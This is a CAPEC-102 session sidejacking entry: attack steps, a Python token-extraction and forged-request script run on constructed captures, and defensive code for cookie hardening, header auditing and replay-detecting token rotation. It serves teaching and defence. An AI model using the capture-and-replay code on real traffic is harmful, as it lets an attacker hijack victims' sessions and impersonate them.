CAPEC-102 - Session Sidejacking

Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim.

This attack is a specific method of session hijacking, which is the exploitation of a valid session token to gain unauthorized access to a target system or its information. Other methods of session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token from it.

  • Attack Methods (4): Time and State; Analysis; Spoofing; Protocol Manipulation
  • Purposes (1): Exploitation
  • Sec Principles (1): Protect Sensitive Data in Transit
  • Scopes (4):
      Gain privileges / assume identity (Authorization, Access_Control, Confidentiality)
      Modify memory (Integrity)
      Read memory (Confidentiality)
      DoS: instability; DoS: crash / exit / restart (Availability)

Attacker skill required: Low. Easy-to-use tools exist to automate this attack.

The attacker and the victim are both using the same WiFi network, so the attacker can observe the victim's traffic.

The victim has an active session with a target system.

The victim is not using a secure channel to communicate with the target system (for example TLS or a VPN).

The victim has initiated communication with the target system in a way that requires the session token to be transmitted, or the target application uses AJAX and therefore periodically "rings home" asynchronously, sending the session token with each request.

Resources required: Low. A laptop and access to a public WiFi network.

Use available tools to sniff communications between the victim and the target system and try to capture the transmitted session token.

Use the captured session token to impersonate the victim on the target system to perform actions and view information on their behalf.

Explore

Step 1 - Detect Unprotected Session Token Transfer

The attacker sniffs the wireless network to detect unencrypted traffic that contains session tokens.

Technique ID: 1 - Environment(s) env-Web

The attacker uses a network sniffer such as ferret or hamster to monitor the wireless traffic at a WiFi hotspot and examines it for session tokens transmitted in unencrypted or otherwise recognizable form. The attacker applies knowledge of how various target systems generate and transmit session tokens in order to identify them in the captured traffic.

Indicator ID: 1 - Environment(s) env-Web env-ClientServer

Type: Positive

The attacker and the victim are both on the same WiFi network.

Indicator ID: 2 - Environment(s) env-Web env-ClientServer

Type: Positive

Traffic between the victim and the targeted application is unencrypted.

Outcome ID: 1

Type: Success

The attacker sees session tokens in the unencrypted traffic.

Experiment

Step 1 - Capture session token

The attacker uses sniffing tools to capture a session token from the traffic.

Step 2 - Insert captured session token

The attacker inserts the captured session token into their own communication with the targeted application to confirm that it is viable for exploitation.

Exploit

Step 1 - Session Token Exploitation

The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.
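The explore, experiment and exploit steps above, as an added example that is not code from CAPEC or from the ferret/hamster tools named on the page: it parses a constructed plaintext HTTP request of the kind an attacker lifts from a captured TCP stream, picks out the cookies and query parameters that look like session tokens, and builds the request that presents the stolen token to the same host. The sample captures, the cookie and parameter names and the host names are all constructed for this example; the name heuristics in SESSION_NAME_RE are an assumption about common framework naming, not a rule from the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a plaintext HTTP request as it appears in a TCP payload
# captured on an open WiFi network. The X-Requested-With header marks it as one
# of the periodic AJAX "ring home" requests that carry the token on every call.
CAPTURED_REQUEST = (
    b"GET /account/messages?page=2 HTTP/1.1\r\n"
    b"Host: webmail.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: lang=en; PHPSESSID=7f3c1d9e0b4a45e2a1c8f6d0e9b3a7c2; tz=UTC\r\n"
    b"X-Requested-With: XMLHttpRequest\r\n"
    b"\r\n"
)

# Constructed sample of an application that carries the token in the URL instead.
CAPTURED_QUERY_REQUEST = (
    b"GET /api/poll?sid=abc123def456ghi789 HTTP/1.1\r\n"
    b"Host: app.example.test\r\n"
    b"\r\n"
)

# Assumed naming pattern for session identifiers (PHPSESSID, JSESSIONID,
# ASP.NET_SessionId, sid, auth_token ...). Heuristic, not exhaustive.
SESSION_NAME_RE = re.compile(r"(sess|sid|token|auth)", re.IGNORECASE)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def looks_random(value: str) -> bool:
    """Session ids are long strings of hex/base64 characters; 'en' or 'UTC' are not."""
    return len(value) >= 16 and re.fullmatch(r"[A-Za-z0-9_\-+/=.]+", value) is not None


def extract_session_tokens(raw: bytes) -> dict:
    """Return {name: value} for anything in the request that looks like a session token."""
    _method, target, headers, _body = parse_http_request(raw)
    found = {}
    # Cookie header: "a=1; b=2; ..." -- keep entries by name pattern or by shape.
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name and (SESSION_NAME_RE.search(name) or looks_random(value)):
            found[name] = value
    # Query string: some applications pass the token as a URL parameter.
    for name, values in parse_qs(urlsplit(target).query).items():
        if SESSION_NAME_RE.search(name):
            found[name] = values[0]
    return found


def forge_request(raw: bytes, path: str = "/account/messages") -> bytes:
    """Build the attacker's own request to the same host carrying only the stolen cookies.

    This is the 'insert captured session token' step; a 200 response with the
    victim's data instead of a login page confirms the token is viable.
    """
    _method, _target, headers, _body = parse_http_request(raw)
    cookie = "; ".join(f"{k}={v}" for k, v in extract_session_tokens(raw).items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {headers['host']}\r\n"
        f"Cookie: {cookie}\r\n\r\n"
    ).encode()


if __name__ == "__main__":
    print(extract_session_tokens(CAPTURED_REQUEST))
    print(forge_request(CAPTURED_REQUEST).decode())
```

In a real capture the same logic runs over the reassembled TCP payload of each client-to-server stream; the token is only visible at all because the stream is plaintext, which is why the mitigations below are all about the transport.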


Ensure that TLS is used for all communication between the client and the target system where sensitive data or operations are available.

Ensure that session cookies are only transmitted over TLS by setting the cookie's Secure attribute. Without it, the browser also sends the cookie on any plaintext HTTP request to the same host, even if the login itself happened over HTTPS.

Make sure that HTTPS is used to communicate with the target system. Alternatively, use a VPN if possible. It is important that all communication between the client and the server happens over an encrypted channel; HTTP Strict Transport Security (HSTS) makes the browser refuse plaintext requests to the site after the first visit, closing the gap left by a typed http:// URL or an old link.
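The Secure-attribute and HTTPS mitigations above, as an added example (not CAPEC code): a small builder for a hardened session cookie header, plus an audit routine that flags the weak setting sidejacking depends on. The HSTS header and the HttpOnly attribute (which blocks the cross-site-scripting route to the token mentioned earlier on the page) are additions beyond what the page lists; the cookie name, token value and sample responses are constructed.

```python
def session_cookie_header(name: str, value: str, secure: bool = True) -> str:
    """Build a Set-Cookie header for a session cookie.

    secure=False reproduces the weak configuration that session sidejacking
    relies on: the browser will attach the cookie to plaintext HTTP requests.
    """
    attrs = [f"{name}={value}", "Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")  # browser sends the cookie over HTTPS only
    return "Set-Cookie: " + "; ".join(attrs)


# One year, covering subdomains: after the first HTTPS visit the browser rewrites
# http:// URLs for this site to https:// itself, so no plaintext request is made.
HSTS_HEADER = "Strict-Transport-Security: max-age=31536000; includeSubDomains"


def audit_response_headers(headers: list) -> list:
    """Return a list of findings for transport weaknesses in a response's headers."""
    findings = []
    has_hsts = False
    for header in headers:
        name, _, value = header.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "set-cookie":
            cookie_name = value.split("=", 1)[0].strip()
            # Attribute names after the leading "name=value" pair, case-insensitive.
            attrs = {a.strip().split("=", 1)[0].lower() for a in value.split(";")[1:]}
            if "secure" not in attrs:
                findings.append(
                    f"{cookie_name}: no Secure attribute, cookie is sent over plaintext HTTP")
            if "httponly" not in attrs:
                findings.append(
                    f"{cookie_name}: no HttpOnly attribute, cookie is readable by page script")
        elif name == "strict-transport-security":
            has_hsts = True
    if not has_hsts:
        findings.append(
            "no Strict-Transport-Security header, a typed http:// URL still reaches the site in the clear")
    return findings


# Constructed responses: the weak configuration beside the corrected one.
WEAK_RESPONSE = ["Set-Cookie: PHPSESSID=7f3c1d9e0b4a45e2a1c8f6d0e9b3a7c2; Path=/"]
HARDENED_RESPONSE = [
    session_cookie_header("PHPSESSID", "7f3c1d9e0b4a45e2a1c8f6d0e9b3a7c2"),
    HSTS_HEADER,
]


if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response_headers(response) or "no findings")
```

The audit is the check to run against an application's login response before assuming the transport mitigations are in place; a Secure flag on the cookie alone does not help if the site also serves the application over plain HTTP and a login form posts there.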

Modify the session token with each transmission and protect it with cryptography. Add request sequencing so that the server can detect replay of a captured token. Note that this is a detection measure rather than a substitute for encryption: the rotated tokens still travel in the clear, and an attacker who uses a captured token before the victim's next request still gets that request through.
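The per-transmission token rotation with request sequencing, as an added example of one way to build it (not CAPEC's or any framework's design): each token carries a session id, a sequence number and an HMAC keyed per session, the server accepts only the sequence number it expects and hands back the next token, and a valid token arriving with a stale sequence number terminates the session because it means the token has been presented twice. The storage layout, token format and user names are assumptions for the example.

```python
import hashlib
import hmac
import secrets


class RotatingSessionStore:
    """Server-side sessions whose token changes on every request.

    Token format: "<session id>.<sequence number>.<HMAC-SHA256 hex>". The HMAC
    is keyed per session and covers both fields, so a client holding one token
    cannot forge one with a later sequence number.
    """

    def __init__(self):
        # session id -> {"key": per-session HMAC key, "seq": expected next seq, "user": owner}
        self._sessions = {}

    def _token(self, sid: str, seq: int) -> str:
        key = self._sessions[sid]["key"]
        mac = hmac.new(key, f"{sid}:{seq}".encode(), hashlib.sha256).hexdigest()
        return f"{sid}.{seq}.{mac}"

    def create(self, user: str) -> str:
        """Log a user in and return the first token to hand to the client."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"key": secrets.token_bytes(32), "seq": 0, "user": user}
        return self._token(sid, 0)

    def consume(self, token: str):
        """Validate a presented token; return (user, next token) or raise PermissionError."""
        try:
            sid, seq_text, _mac = token.split(".")
            seq = int(seq_text)
        except ValueError:
            raise PermissionError("malformed token")
        session = self._sessions.get(sid)
        if session is None:
            raise PermissionError("unknown session")
        # Recompute the token for the claimed sequence number and compare in constant time.
        if not hmac.compare_digest(self._token(sid, seq), token):
            raise PermissionError("bad MAC")
        if seq != session["seq"]:
            # Valid MAC, stale sequence number: the token was presented twice, either
            # by a sidejacker replaying a capture or by the real client after the
            # attacker used it first. Either way the session is compromised, so end
            # it rather than guess which party is legitimate.
            del self._sessions[sid]
            raise PermissionError("replay detected, session terminated")
        session["seq"] += 1
        return session["user"], self._token(sid, session["seq"])


def try_consume(store: RotatingSessionStore, token: str):
    """Return (user, next token) on success, None when the server rejects the token."""
    try:
        return store.consume(token)
    except PermissionError:
        return None


def replay_scenario() -> dict:
    """Victim logs in and sends one request; a sidejacker then replays the captured token."""
    store = RotatingSessionStore()
    t0 = store.create("alice")            # token the victim's browser holds
    user, t1 = store.consume(t0)          # victim's first request; the sniffer captures t0
    attacker = try_consume(store, t0)     # attacker replays the captured token
    victim_next = try_consume(store, t1)  # victim's next request, after the replay
    return {
        "first_ok": user == "alice",
        "replay_rejected": attacker is None,
        "session_terminated": victim_next is None,
    }


if __name__ == "__main__":
    print(replay_scenario())
```

Strict sequencing assumes one request in flight at a time; an application that issues several AJAX calls concurrently, as the prerequisites on this page describe, needs a small window of acceptable sequence numbers or a per-request nonce list instead of a single counter, or legitimate traffic will trip the replay check.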